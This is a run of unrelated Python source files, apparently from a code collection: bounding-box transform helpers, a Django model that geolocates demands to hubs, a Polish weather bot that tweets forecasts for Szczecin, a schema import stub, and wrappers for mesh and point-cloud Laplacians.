the aspect ratio. i.e, if width > height, then image will be rescaled to
(output_size * width / height, output_size)
"""
w, h = size
if isinstance(output_size, int):
if (w <= h and w == output_size) or (h <= w and h == output_size):
return anns
if w < h:
ow = output_size
sw = sh = ow / w
else:
oh = output_size
sw = sh = oh / h
else:
ow, oh = output_size
sw = ow / w
sh = oh / h
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[0] *= sw
bbox[1] *= sh
bbox[2] *= sw
bbox[3] *= sh
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def to_percent_coords(anns, size):
r"""
Convert absolute coordinates of the bounding boxes to percent cocoordinates.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[0] /= w
bbox[1] /= h
bbox[2] /= w
bbox[3] /= h
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def to_absolute_coords(anns, size):
r"""
Convert percent coordinates of the bounding boxes to absolute cocoordinates.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[0] *= w
bbox[1] *= h
bbox[2] *= w
bbox[3] *= h
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def hflip(anns, size):
"""
Horizontally flip the bounding boxes of the given PIL Image.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[0] = w - (bbox[0] + bbox[2])
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def hflip2(anns, size):
"""
Horizontally flip the bounding boxes of the given PIL Image.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, r, b].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
l = bbox[0]
bbox[0] = w - bbox[2]
bbox[2] = w - l
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def vflip(anns, size):
"""
Vertically flip the bounding boxes of the given PIL Image.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[1] = h - (bbox[1] + bbox[3])
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def vflip2(anns, size):
r"""
Vertically flip the bounding boxes of the given PIL Image.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
size : ``Sequence[int]``
Size of the original image.
"""
w, h = size
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
t = bbox[1]
bbox[1] = h - bbox[3]
bbox[3] = h - t
new_anns.append({**ann, "bbox": bbox})
return new_anns
@curry
def move(anns, x, y):
r"""
Move the bounding boxes by x and y.
Parameters
----------
anns : ``List[Dict]``
Sequences of annotation of objects, containing `bbox` of [l, t, w, h].
x : ``Number``
How many to move along the horizontal axis.
y : ``Number``
How many to move along the vertical axis.
"""
new_anns = []
for ann in anns:
bbox = list(ann['bbox'])
bbox[0] += x
bbox[1] += y
new_anns.append({**ann, "bbox": bbox})
return new_anns
| 10,920 | 3,902 |
from django.db import models
from profiles.models import Profile, ProfileHub
from hubs.models import Hub, HubGeolocation
from django.db.models.signals import post_save
from demands.extras.coordinates import coordinates_calculation
from demands.extras.distance import distance_calculation
# Create your models here.
class Demand(models.Model):
title = models.CharField(max_length=100, blank=False)
description = models.TextField(blank=False)
number = models.CharField(max_length=10, blank=True)
street = models.CharField(max_length=200, blank=False)
postal_code = models.CharField(max_length=10, blank=False)
city = models.CharField(max_length=50, blank=False)
requester =models.ForeignKey(Profile, on_delete=models.CASCADE, related_name='profile_demands')
is_CAPS = models.BooleanField(default=True)
is_BARTER = models.BooleanField(default=True)
is_GIVE = models.BooleanField(default=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
price_CAPS = models.PositiveIntegerField(null=True)
price_barter = models.CharField(max_length = 200, null=True)
def Demand_created_or_updated(sender,update_fields, **kwargs):
instance = kwargs['instance']
if kwargs['created']:
lat_cal, lng_cal = coordinates_calculation(instance.number, instance.street, instance.postal_code, instance.city)
Demand_Hub.objects.create(demand = instance, lat=lat_cal, lng= lng_cal)
demand_geo = Demand_Hub.objects.get(demand = instance)
hubSelected = ProfileHub.objects.get(profile=instance.requester).hub
hub_geo = HubGeolocation.objects.get(hub=hubSelected)
distanceCalculation = distance_calculation(demand_geo,hub_geo)
demand_geo.hub=hubSelected
demand_geo.distance_km=distanceCalculation
demand_geo.save()
post_save.connect(Demand_created_or_updated, sender=Demand)
class Demand_Hub(models.Model):
demand = models.OneToOneField(Demand, on_delete=models.CASCADE)
hub = models.ForeignKey(Hub, on_delete=models.CASCADE, null= True, related_name='demands')
distance_km = models.DecimalField(max_digits=10, decimal_places=3, blank=False, null=True)
lat = models.DecimalField(max_digits=9, decimal_places=6, blank=True, null=True)
# Lng = longinitude of the user
lng = models.DecimalField(max_digits=9, decimal_places=6, blank=True, null=True) | 2,429 | 788 |
# -*- coding: utf-8 -*-
import random
import time
import tweetpony
import urllib2
import json
from config import config
def fetch(url):
req = urllib2.Request(url)
response = urllib2.urlopen(req)
return response.read()
def get_json():
return json.loads(fetch("http://weather.spychalski.info/api.php"))
def main():
api = tweetpony.API(consumer_key=config['consumer_key'], consumer_secret=config['consumer_secret'],
access_token=config['access_token'], access_token_secret=config['access_token_secret'])
# noinspection PyStatementEffect
api.user
weather_data = get_json()
temperature = int(round(float(weather_data['Temperature'])))
humidity = int(round(float(weather_data['Humidity'])))
pressure = int(round(float(weather_data['Pressure'])))
try:
# print weather_data
message_type = 1
current_hour = int(time.strftime("%H"))
if current_hour >= 6 and current_hour <= 10:
message_type = 2
elif current_hour >= 19 and current_hour <= 23:
message_type = 3
text = ''
if message_type == 1:
text = u'Witaj Szczecinie, mamy ' + unicode(str(temperature)) + u'C i ' + unicode(
str(humidity)) + u'% wilgotności. Ciśnienie wynosi ' + unicode(str(pressure)) + 'hPa #szczecin #pogoda'
elif message_type == 2:
text = u'Prognoza na dziś: ' + unicode(
str(int(round(float(weather_data['Forecast'][0]['TempDay']))))) + u'C, ciśnienie ' + \
unicode(str(pressure)) + u'hPa, wiatr ' + unicode(
str(int(round(float(weather_data['Forecast'][0]['WindSpeed']))))) + u'm/s, '
rain = float(weather_data['Forecast'][0]['Rain'])
snow = float(weather_data['Forecast'][0]['Snow'])
if rain > 0 and snow == 0:
text += u'będzie padać'
elif rain == 0 and snow > 0:
text += u'będzie padać śnieg'
elif rain > 0 and snow > 0:
text += u'będzie padać śnieg z deszczem'
else:
text += u'brak opadów'
text += ' #pogoda #szczecin'
elif message_type == 3:
text = u'Prognoza na jutro: ' + unicode(
str(int(round(float(weather_data['Forecast'][1]['TempDay']))))) + u'C, ciśnienie ' + \
unicode(str(pressure)) + u'hPa, wiatr ' + unicode(
str(int(round(float(weather_data['Forecast'][1]['WindSpeed']))))) + u'm/s, '
rain = float(weather_data['Forecast'][1]['Rain'])
snow = float(weather_data['Forecast'][1]['Snow'])
if rain > 0 and snow == 0:
text += u'będzie padać'
elif rain == 0 and snow > 0:
text += u'będzie padać śnieg'
elif rain > 0 and snow > 0:
text += u'będzie padać śnieg z deszczem'
else:
text += u'brak opadów'
text += ' #pogoda #szczecin'
# print text
api.update_status(status=text)
except tweetpony.APIError as err:
print "Oops, something went wrong! Twitter returned error #%i and said: %s" % (err.code, err.description)
else:
print "Yay! Your tweet has been sent!"
if __name__ == "__main__":
main()
| 3,353 | 1,139 |
from output.models.nist_data.atomic.long.schema_instance.nistschema_sv_iv_atomic_long_max_exclusive_1_xsd.nistschema_sv_iv_atomic_long_max_exclusive_1 import NistschemaSvIvAtomicLongMaxExclusive1
__all__ = [
"NistschemaSvIvAtomicLongMaxExclusive1",
]
| 256 | 105 |
import numpy as np
import robust_laplacian_bindings as rlb
def mesh_laplacian(verts, faces, mollify_factor=1e-5):
## Validate input
if type(verts) is not np.ndarray:
raise ValueError("`verts` should be a numpy array")
if (len(verts.shape) != 2) or (verts.shape[1] != 3):
raise ValueError("`verts` should have shape (V,3), shape is " + str(verts.shape))
if type(faces) is not np.ndarray:
raise ValueError("`faces` should be a numpy array")
if (len(faces.shape) != 2) or (faces.shape[1] != 3):
raise ValueError("`faces` should have shape (F,3), shape is " + str(faces.shape))
## Call the main algorithm from the bindings
L, M = rlb.buildMeshLaplacian(verts, faces, mollify_factor)
## Return the result
return L, M
def point_cloud_laplacian(points, mollify_factor=1e-5, n_neighbors=30):
## Validate input
if type(points) is not np.ndarray:
raise ValueError("`points` should be a numpy array")
if (len(points.shape) != 2) or (points.shape[1] != 3):
raise ValueError("`points` should have shape (V,3), shape is " + str(points.shape))
## Call the main algorithm from the bindings
L, M = rlb.buildPointCloudLaplacian(points, mollify_factor, n_neighbors)
## Return the result
return L, M
| 1,310 | 458 |